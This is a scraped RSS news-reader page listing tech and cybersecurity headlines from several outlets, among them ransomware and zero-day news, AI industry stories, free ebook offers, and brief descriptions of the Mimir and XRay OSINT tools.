News Reader

News Reader

RSS tabs below. Last time of page update: 2025-09-13 07:09:47 GMT+0 Click Here to refresh the page.

START

Select a tab to begin reading.

Tech RSS feeds

Below are tech sites.

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

From Vibe Coding to Vibe Hacking: Claude AI Abused To Build Ransomware

Anthropic’s Claude AI presently rules the realm of vibe coding. However, the company has unveiled…

From Vibe Coding to Vibe Hacking: Claude AI Abused To Build Ransomware on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 12 Sep 2025 14:03:54 +0000

WhatsApp Addressed An Actively Exploited Zero-Day Vulnerability

Heads up, WhatsApp users. A serious zero-day vulnerability existed in WhatsApp that was already exploited…

WhatsApp Addressed An Actively Exploited Zero-Day Vulnerability on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 12 Sep 2025 14:02:48 +0000

Cybersecurity Breaches

Today, organizations of all sizes operate under a constant, low-grade threat of cyber intrusion. The…

Cybersecurity Breaches on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 12 Sep 2025 13:59:11 +0000

Latest news

I tried Apple's 2 big AI features announced at the iPhone 17 event - and both are game changers

Apple focused on its cutting edge hardware for the iPhone 17 launch, but also unveiled a couple groundbreaking AI features. Both could make a big difference in daily use.

Article link

Date of publish: Sat, 13 Sep 2025 01:11:38 GMT

ChatGPT just saved me 25% off my dinner tonight - here's how

You can use free ChatGPT or ChatGPT Plus to look for copuon codes. But one trick gets the best results.

Article link

Date of publish: Fri, 12 Sep 2025 21:11:00 GMT

FTC scrutinizes OpenAI, Meta, and others on AI companion safety for kids

Seven tech companies are under investigation, following recent reports of AI companions behaving badly. Here's why.

Article link

Date of publish: Fri, 12 Sep 2025 19:14:00 GMT

NYT > Technology

Roblox Sued for Wrongful Death After Teenager’s Suicide

At age 7, Ethan Dallas began playing the online game, where he met Nate. Deadly abuse followed, said Ethan’s mother, who blames Roblox.

Article link

Date of publish: Fri, 12 Sep 2025 13:43:07 +0000

‘Civil War’ Mentions Surge Online After Charlie Kirk Shooting

The term has increasingly been invoked on social media after major political moments, highlighting divisions among Americans.

Article link

Date of publish: Fri, 12 Sep 2025 09:03:00 +0000

A.I.’s Prophet of Doom Wants to Shut It All Down

Eliezer Yudkowsky has spent the past 20 years warning A.I. insiders of danger. Now, he’s making his case to the public.

Article link

Date of publish: Fri, 12 Sep 2025 09:00:57 +0000

BleepingComputer

New HybridPetya ransomware can bypass UEFI Secure Boot

A recently discovered ransomware strain called HybridPetya can bypass the UEFI Secure Boot feature to install a malicious application on the EFI System Partition. [...]

Article link

Date of publish: Fri, 12 Sep 2025 13:18:07 -0400

CISA warns of actively exploited Dassault RCE vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of hackers exploiting a critical remote code execution flaw in DELMIA Apriso, a  manufacturing operations management (MOM) and execution (MES) solution from French company Dassault Systèmes. [...]

Article link

Date of publish: Fri, 12 Sep 2025 12:19:39 -0400

Windows 11 23H2 Home and Pro reach end of support in 60 days

Microsoft has reminded customers today that devices running Home and Pro editions of Windows 11 23H2 will stop receiving updates in November. [...]

Article link

Date of publish: Fri, 12 Sep 2025 12:15:22 -0400

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Hacker News: Front Page

Qwen 3 now supports ARM and MLX
SkiftOS: A hobby OS built from scratch using C/C++ for ARM, x86, and RISC-V

Article URL: https://skiftos.org

Comments URL: https://news.ycombinator.com/item?id=45229414

Points: 33

# Comments: 7

Article link

Date of publish: Sat, 13 Sep 2025 04:55:14 +0000

Raspberry Pi Synthesizers – How the Pi is transforming synths

Article URL: https://www.gearnews.com/raspberry-pi-synthesizers-how-the-pi-is-transforming-synths/

Comments URL: https://news.ycombinator.com/item?id=45229227

Points: 14

# Comments: 5

Article link

Date of publish: Sat, 13 Sep 2025 04:08:57 +0000

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

From Vibe Coding to Vibe Hacking: Claude AI Abused To Build Ransomware

Anthropic’s Claude AI presently rules the realm of vibe coding. However, the company has unveiled…

From Vibe Coding to Vibe Hacking: Claude AI Abused To Build Ransomware on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 12 Sep 2025 14:03:54 +0000

WhatsApp Addressed An Actively Exploited Zero-Day Vulnerability

Heads up, WhatsApp users. A serious zero-day vulnerability existed in WhatsApp that was already exploited…

WhatsApp Addressed An Actively Exploited Zero-Day Vulnerability on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 12 Sep 2025 14:02:48 +0000

Cybersecurity Breaches

Today, organizations of all sizes operate under a constant, low-grade threat of cyber intrusion. The…

Cybersecurity Breaches on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Fri, 12 Sep 2025 13:59:11 +0000

Link11 Reports 225% more DDoS attacks in H1 2025 with new tactics against infrastructure
Adding Prompt Injection To Image Scaling Attacks Threatens AI Systems

As image generation and processing using AI tools become more common, ensuring thorough security throughout…

Adding Prompt Injection To Image Scaling Attacks Threatens AI Systems on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Mon, 01 Sep 2025 12:07:46 +0000

A Google Calendar Flaw Could Allow Hijacking Gemini Via Malicious Invites

Researchers discovered a major security flaw in Google Calendar that could allow hijacking Gemini agents…

A Google Calendar Flaw Could Allow Hijacking Gemini Via Malicious Invites on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 20 Aug 2025 12:00:47 +0000

Microsoft Fixed Over 100 Flaws With August 2025 Patch Tuesday

Microsoft has released the scheduled Patch Tuesday updates for August 2025. This month’s update bundle…

Microsoft Fixed Over 100 Flaws With August 2025 Patch Tuesday on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 20 Aug 2025 10:39:31 +0000

PXA Python Malware Targets Thousands Of Victims Globally

A new malware campaign has affected users globally, stealing sensitive data. Identified as PXA stealer,…

PXA Python Malware Targets Thousands Of Victims Globally on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Sat, 16 Aug 2025 07:40:15 +0000

Project Ire – Microsoft Launches AI Agent For Automated Malware Classification

Microsoft recently announced the launch of Project Ire – a dedicated AI agent for malware…

Project Ire – Microsoft Launches AI Agent For Automated Malware Classification on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Sat, 16 Aug 2025 07:26:13 +0000

WinRAR Fixed A Zero-Day Flaw Exploited By RomCom

The popular file archiving tool WinRAR had a serious zero-day vulnerability threatening systems with code…

WinRAR Fixed A Zero-Day Flaw Exploited By RomCom on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 13 Aug 2025 10:37:26 +0000

Latest news

I tried Apple's 2 big AI features announced at the iPhone 17 event - and both are game changers

Apple focused on its cutting edge hardware for the iPhone 17 launch, but also unveiled a couple groundbreaking AI features. Both could make a big difference in daily use.

Article link

Date of publish: Sat, 13 Sep 2025 01:11:38 GMT

ChatGPT just saved me 25% off my dinner tonight - here's how

You can use free ChatGPT or ChatGPT Plus to look for copuon codes. But one trick gets the best results.

Article link

Date of publish: Fri, 12 Sep 2025 21:11:00 GMT

FTC scrutinizes OpenAI, Meta, and others on AI companion safety for kids

Seven tech companies are under investigation, following recent reports of AI companions behaving badly. Here's why.

Article link

Date of publish: Fri, 12 Sep 2025 19:14:00 GMT

Your Powerbeats Pro 2 are getting a serious upgrade - but there's a catch

Apple says it's improved heart rate tracking features with Beats, which is great news for iPhone users, and not so much for Android fans.

Article link

Date of publish: Fri, 12 Sep 2025 18:52:53 GMT

This 'critical' Cursor security flaw could expose your code to malware - how to fix it

A feature being disabled by default could leave users and their organizations vulnerable to commands that run automatically.

Article link

Date of publish: Fri, 12 Sep 2025 18:32:00 GMT

T-Mobile will give you a free iPhone 17 Pro with this preorder deal - how to qualify

At T-Mobile, you can get the all-new iPhone 17 Pro for free when you sign up for or switch to the Experience Beyond mobile plan and use a qualifying trade-in.

Article link

Date of publish: Fri, 12 Sep 2025 18:29:00 GMT

I built my own AirTag-like tracker with this Raspberry Pi alternative - how it works

If you're into Raspberry Pi, or just starting out, this project is great to sink your teeth into.

Article link

Date of publish: Fri, 12 Sep 2025 17:30:37 GMT

Apple iPhone 17 event recap: iPhone Air preorders, Apple Watch 11, AirPods Pro 3, more

ZDNET has rounded up everything announced at this week's Apple event - from iPhone 17 preorder deals to the Apple Watch Ultra 3, AirPods Pro 3, and more.

Article link

Date of publish: Fri, 12 Sep 2025 16:55:00 GMT

The best iPhone 17 cases of 2025 (including the Air, Pro, and Max models)

ZDNET editors have tested dozens of iPhone cases over the years to help you choose the right one for your new iPhone 17, iPhone Air, iPhone 17 Pro, or iPhone 17 Pro Max.

Article link

Date of publish: Fri, 12 Sep 2025 16:37:00 GMT

Best robot vacuum mops of 2025: I've tested dozens of these robots - here are the top ones

We've tested more than 50 of the top robot vacuum and mop combos from brands like iRobot, Roborock, Eufy, and Dreame to find out which is best at keeping a home clean.

Article link

Date of publish: Fri, 12 Sep 2025 15:34:45 GMT

Why the Samsung S95F is one of the best OLED TVs you can buy - especially at this price

The Samsung S95F offers excellent picture and audio in one of the thinnest OLED TVs I've ever seen, making it perfect for users looking to stay on the cutting edge of entertainment.

Article link

Date of publish: Fri, 12 Sep 2025 15:28:00 GMT

This exclusive discount makes the best smart lock I've ever tested that much better

The Lockly Visage Zeno Series is one of the smartest devices you can add to your smart home, especially when paired with this ZDNET-exclusive discount.

Article link

Date of publish: Fri, 12 Sep 2025 15:12:16 GMT

I used Google Lens to identify my weirdest junk drawer items - here's how it did

Think Google Lens is just for IDing flowers and landmarks? I tried it on random 3D printed parts, medical thingamajigs, and one oddly familiar object that almost tricked it.

Article link

Date of publish: Fri, 12 Sep 2025 14:48:59 GMT

These popular free VPNs all share the same shady security practices - here's why

A new study revealed potential links between some of the most downloaded VPNs in the Google Play Store with deceptive practices and poor security standards.

Article link

Date of publish: Fri, 12 Sep 2025 14:41:06 GMT

Why IPVanish is going RAM-only - and what it means for your privacy and data

The VPN's RAM-only servers are now available in 19 countries, including 10 US states.

Article link

Date of publish: Fri, 12 Sep 2025 14:31:00 GMT

I did 24 days of coding in 12 hours with a $20 AI tool - but there's one big pitfall

Professional coders pay hundreds monthly for AI assistance. Can a $20 ChatGPT Plus plan with Codex access rival these premium tools? I decided to find out, and 16x'ed my programming output in the process.

Article link

Date of publish: Fri, 12 Sep 2025 14:07:00 GMT

Preorder the iPhone 17 at AT&T and get up to $1,100 off right now - how the deal works

AT&T has deals on the new iPhone 17, iPhone 17 Pro, iPhone 17 Pro Max, and iPhone Air, open for preorders now. Here are all the details.

Article link

Date of publish: Fri, 12 Sep 2025 13:39:12 GMT

The best Garmin watches of 2025: Expert tested and reviewed

We tested the best Garmin watches to help you decide which smartwatch is the right option for you, no matter your budget.

Article link

Date of publish: Fri, 12 Sep 2025 13:25:18 GMT

The 5 best iPads of 2025: We've tested every iPad available - these are the best ones

From the iPad Mini to the iPad Pro, ZDNET tested all the iPad models available to help you choose the right one for your needs.

Article link

Date of publish: Fri, 12 Sep 2025 13:24:28 GMT

The best laptops under $1,000 of 2025: Expert tested and reviewed

Be more productive with the top laptops under $1,000 from brands like Apple, Acer, and Lenovo.

Article link

Date of publish: Fri, 12 Sep 2025 13:24:02 GMT

NYT > Technology

Roblox Sued for Wrongful Death After Teenager’s Suicide

At age 7, Ethan Dallas began playing the online game, where he met Nate. Deadly abuse followed, said Ethan’s mother, who blames Roblox.

Article link

Date of publish: Fri, 12 Sep 2025 13:43:07 +0000

‘Civil War’ Mentions Surge Online After Charlie Kirk Shooting

The term has increasingly been invoked on social media after major political moments, highlighting divisions among Americans.

Article link

Date of publish: Fri, 12 Sep 2025 09:03:00 +0000

A.I.’s Prophet of Doom Wants to Shut It All Down

Eliezer Yudkowsky has spent the past 20 years warning A.I. insiders of danger. Now, he’s making his case to the public.

Article link

Date of publish: Fri, 12 Sep 2025 09:00:57 +0000

Are We Past Peak iPhone? + Eliezer Yudkowsky on A.I. Doom

“There’s only so many things that you can do to redesign a glass rectangle in your pocket.”

Article link

Date of publish: Fri, 12 Sep 2025 15:31:43 +0000

Tesla Board Chair Defend’s Elon Musk’s Humongous Pay Proposal

Robyn Denholm, normally media shy, is campaigning to get shareholders to back the chief executive’s trillion-dollar compensation package.

Article link

Date of publish: Fri, 12 Sep 2025 21:38:08 +0000

Trump Administration Seeks Pilot Projects for Air Taxis

The projects would allow small electric or hybrid aircraft to carry passengers or cargo before federal regulators approve their commercial use.

Article link

Date of publish: Fri, 12 Sep 2025 17:17:09 +0000

OpenAI Takes Big Steps Toward Its Long-Planned Reorganization

The start-up reached a tentative deal with Microsoft, its biggest investor, and said it would give a $100 billion stake to the nonprofit that manages it.

Article link

Date of publish: Thu, 11 Sep 2025 23:06:54 +0000

Nepal’s Social Media Ban Backfires as Politics Moves to a Chat Room

“The Parliament of Nepal right now is Discord,” a user said of the platform popular with video gamers, where tens of thousands are debating the nation’s future.

Article link

Date of publish: Fri, 12 Sep 2025 01:10:01 +0000

Wild Speculation and Misinformation on Charlie Kirk Shooting Spreads on Social Media

Social media users are spreading elaborate and entirely unsubstantiated theories about what happened to the conservative commentator.

Article link

Date of publish: Thu, 11 Sep 2025 20:53:43 +0000

F.T.C. Starts Inquiry Into A.I. Chatbots and Child Safety

The Federal Trade Commission said it was starting an inquiry of how six major tech companies monitor activity that could harm minors.

Article link

Date of publish: Thu, 11 Sep 2025 20:02:42 +0000

Their Schools Banned Phones. Out Came the iPods and Cassette Players.

Enterprising students have been bringing the contraband of yesteryear to school in what they see as a “loophole” in cellphone bans.

Article link

Date of publish: Thu, 11 Sep 2025 15:56:04 +0000

Small Businesses Face a New Threat: Pay Up or Be Flooded With Bad Reviews

Movers, roofing companies and others are being bombarded with phony one-star reviews on Google Maps. Then they’re asked to pay up.

Article link

Date of publish: Thu, 11 Sep 2025 14:19:22 +0000

Canadian Man Falsely Named as Charlie Kirk’s Shooter on Social Media

The 77-year-old former banker, who lives in Toronto, said he was “shocked” by the speed at which his photograph spread online.

Article link

Date of publish: Thu, 11 Sep 2025 04:14:00 +0000

Videos of Charlie Kirk’s Shooting Spread Rapidly on Social Media

First posted to X, they amassed millions of views on Instagram, Threads, YouTube and Telegram within hours.

Article link

Date of publish: Fri, 12 Sep 2025 12:20:05 +0000

OpenAI Signs $300 Billion Data Center Pact With Tech Giant Oracle

The funding covers more than half of the A.I. data centers that OpenAI plans to build in the U.S. over the next several years.

Article link

Date of publish: Wed, 10 Sep 2025 20:31:27 +0000

Senators Demand Answers From Mark Zuckerberg on WhatsApp Security

Three Republican senators sent a letter to Meta’s chief executive on Wednesday asking him to respond to whistle-blower allegations over security flaws.

Article link

Date of publish: Thu, 11 Sep 2025 02:57:31 +0000

Royal Ballet and Opera Confronts A.I. With ‘RBO/Shift’ Festival

The London institution is creating “RBO/Shift,” a technology festival whose first year will ask how far A.I. can push the boundaries of opera.

Article link

Date of publish: Wed, 10 Sep 2025 17:49:25 +0000

Why Mark S. Zuckerberg Is Suing Facebook’s Parent Company

Facebook has repeatedly flagged his accounts, he says, for “impersonating” the company’s founder, Mark E. Zuckerberg.

Article link

Date of publish: Tue, 09 Sep 2025 21:02:21 +0000

Apple Introduces iPhone 17, iPhone Air and Updated AirPods at Annual Event

The Silicon Valley giant also introduced updates to its traditional smartphones, as well as its AirPods and Apple Watch.

Article link

Date of publish: Tue, 09 Sep 2025 21:58:42 +0000

Exxon Wants to Make More of the Materials Needed for E.V. Batteries

The oil giant said Tuesday that it was acquiring assets from a Chicago company as it looks to start producing graphite, a key battery ingredient, by the end of the decade.

Article link

Date of publish: Tue, 09 Sep 2025 21:06:10 +0000

United Arab Emirates Joins U.S. and China in Giving Away A.I. Technology

The Persian Gulf nation has “open sourced” technology meant to compete with OpenAI and China’s DeepSeek.

Article link

Date of publish: Tue, 09 Sep 2025 15:14:34 +0000

Nvidia Accuses Rivals of Being A.I. Doomers as US Debates Sale of Chips to China

Rankling national security experts, the chipmaker has stepped up attacks on lawmakers who are pushing restrictions.

Article link

Date of publish: Tue, 09 Sep 2025 13:59:05 +0000

ASML to Invest $1.5 Billion in Mistral, the French A.I. Start-Up

ASML, the Dutch maker of semiconductor equipment, is investing about $1.5 billion in Mistral, the French A.I. start-up.

Article link

Date of publish: Tue, 09 Sep 2025 13:59:33 +0000

Whistle-Blower Sues Meta Over Claims of WhatsApp Security Flaws

In a lawsuit filed Monday, the former head of security for the messaging app accused the social media company of putting billions of users at risk. Meta pushed back on his claim.

Article link

Date of publish: Mon, 08 Sep 2025 22:16:32 +0000

Tech Companies Show Off for Trump’s ‘Golden Dome’

Tech companies are displaying A.I., lasers and more as they compete for a piece of President Trump’s ambitious plan for a missile defense shield.

Article link

Date of publish: Mon, 08 Sep 2025 15:49:14 +0000

A Tech Reporter’s Side Gig: Music Writing

Every so often, Mike Isaac swerves from his Silicon Valley beat to write about bands.

Article link

Date of publish: Mon, 08 Sep 2025 14:27:37 +0000

A.I. Could Make the Smartphone Passé. What Comes Next?

As Apple prepares to release new iPhones this week, industry veterans shared their predictions for what will be the next big thing in personal computing.

Article link

Date of publish: Tue, 09 Sep 2025 04:41:27 +0000

The Spectacular Comeback Tour of Ross Ulbricht, the Founder of Silk Road

Ross Ulbricht, who created the Silk Road dark web marketplace and was serving a life sentence for drug distribution, has embarked on a strange and unexpected comeback after President Trump pardoned him in January.

Article link

Date of publish: Sun, 07 Sep 2025 15:48:34 +0000

Jean Twenge Is Still Warning Parents About Teens and Screen Time. Is Anyone Listening?

The researcher and author Jean Twenge has a prescription for the harmful effects of screen time on children. If only parents would listen.

Article link

Date of publish: Mon, 08 Sep 2025 18:05:07 +0000

BleepingComputer

New HybridPetya ransomware can bypass UEFI Secure Boot

A recently discovered ransomware strain called HybridPetya can bypass the UEFI Secure Boot feature to install a malicious application on the EFI System Partition. [...]

Article link

Date of publish: Fri, 12 Sep 2025 13:18:07 -0400

CISA warns of actively exploited Dassault RCE vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of hackers exploiting a critical remote code execution flaw in DELMIA Apriso, a  manufacturing operations management (MOM) and execution (MES) solution from French company Dassault Systèmes. [...]

Article link

Date of publish: Fri, 12 Sep 2025 12:19:39 -0400

Windows 11 23H2 Home and Pro reach end of support in 60 days

Microsoft has reminded customers today that devices running Home and Pro editions of Windows 11 23H2 will stop receiving updates in November. [...]

Article link

Date of publish: Fri, 12 Sep 2025 12:15:22 -0400

The first three things you’ll want during a cyberattack

When cyberattacks hit, every second counts. Survival depends on three essentials: clarity to see what's happening, control to contain it, and a lifeline to recover fast. Learn from Acronis TRU how MSPs and IT teams can prepare now for the difference between recovery and catastrophe. [...]

Article link

Date of publish: Fri, 12 Sep 2025 10:02:12 -0400

Man gets over 4 years in prison for selling unreleased movies

A Tennessee court has sentenced a Memphis man who worked for a DVD and Blu-ray manufacturing and distribution company to 57 months in prison for stealing and selling digital copies of unreleased movies. [...]

Article link

Date of publish: Fri, 12 Sep 2025 07:36:22 -0400

Samsung patches actively exploited zero-day reported by WhatsApp

Samsung has patched a remote code execution vulnerability that was exploited in zero-day attacks targeting its Android devices. [...]

Article link

Date of publish: Fri, 12 Sep 2025 05:48:30 -0400

Microsoft fixes Exchange Online outage affecting users worldwide

Microsoft says that it has mitigated an Exchange Online outage affecting customers worldwide, which blocked their access to emails and calendars. [...]

Article link

Date of publish: Thu, 11 Sep 2025 15:43:00 -0400

U.S. Senator accuses Microsoft of “gross cybersecurity negligence”

U.S. Senator Ron Wyden has sent a letter to the Federal Trade Commission (FTC) requesting the agency to investigate Microsoft for failing to provide adequate security in its products, which led to ransomware attacks against healthcare organizations. [...]

Article link

Date of publish: Thu, 11 Sep 2025 15:23:41 -0400

Apple warns customers targeted in recent spyware attacks

Apple warned customers last week that their devices were targeted in a new series of spyware attacks, according to the French national Computer Emergency Response Team (CERT-FR). [...]

Article link

Date of publish: Thu, 11 Sep 2025 15:02:51 -0400

Panama Ministry of Economy discloses breach claimed by INC ransomware

Panama's Ministry of Economy and Finance (MEF) has disclosed that one of its computers may have been compromised in a cyberattack.. [...]

Article link

Date of publish: Thu, 11 Sep 2025 14:26:59 -0400

Microsoft adds malicious link warnings to Teams private chats

Microsoft Teams will automatically alert users when they send or receive a private message containing links that are tagged as malicious. [...]

Article link

Date of publish: Thu, 11 Sep 2025 13:21:23 -0400

Akira ransomware exploiting critical SonicWall SSLVPN bug again

The Akira ransomware gang is actively exploiting CVE-2024-40766, a year-old critical-severity access control vulnerability, to gain unauthorized access to SonicWall devices. [...]

Article link

Date of publish: Thu, 11 Sep 2025 12:32:15 -0400

New VMScape attack breaks guest-host isolation on AMD, Intel CPUs

A new Spectre-like attack dubbed VMScape allows a malicious virtual machine (VM) to leak cryptographic keys from an unmodified QEMU hypervisor process running on modern AMD or Intel CPUs. [...]

Article link

Date of publish: Thu, 11 Sep 2025 11:05:05 -0400

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Best Practices For Protecting Against Phishing, Ransomware and Email Fraud


"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"


Osterman Research conducted a survey among corporate decisions makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that was successful in infecting their networks with malware.

Over 17% of organizations had email as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.

Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.

Article link

Date of publish: Mon, 25 Nov 2019 07:46:00 +0000

XRay - Using For Recon Mapping And OSINT Suite


XRay is a software for recon, mapping and OSINT gathering from public networks.

XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.

How Does it Work?

XRay is a very simple tool, it works this way:
  1. It'll bruteforce subdomains using a wordlist and DNS requests.
  2. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
  3. If a ViewDNS API key is provided, for every subdomain historical data will be collected.
  4. For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
  5. Eventually the data is presented to the user on the web ui.

